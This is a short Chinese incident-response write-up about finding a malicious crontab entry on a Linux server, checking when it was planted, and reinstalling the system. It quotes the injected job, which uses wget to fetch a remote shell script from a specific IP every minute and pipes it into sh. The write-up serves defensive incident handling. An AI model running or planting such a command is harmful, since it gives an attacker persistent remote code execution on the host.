---

一、查看定时任务

# crontab -l
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
0 */1 * * * /usr/local/nginx/sbin/nginx -s reload

发现异常任务：

* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

查 IP 发现为来自俄罗斯的恶意 IP：


查看主机环境变量已被更改，相关命令无法使用，且主机中异常计划任务早于2023-07-04 就已被植入：

# cat /var/spool/cron/root
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1
0 */1 * * * /usr/local/nginx/sbin/nginx -s reload

# stat /var/spool/cron/root
  File: ‘/var/spool/cron/root’
  Size: 125       	Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d	Inode: 552530      Links: 1
Access: (0600/-rw-------)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2024-06-06 10:39:22.013106004 +0800
Modify: 2023-07-04 12:50:46.478638868 +0800
Change: 2023-07-04 12:50:46.478638868 +0800

二、处理方法

清除异常任务，重启服务器。
由于重启前后，相关命令如ps、ls等都无法使用，最后重装系统！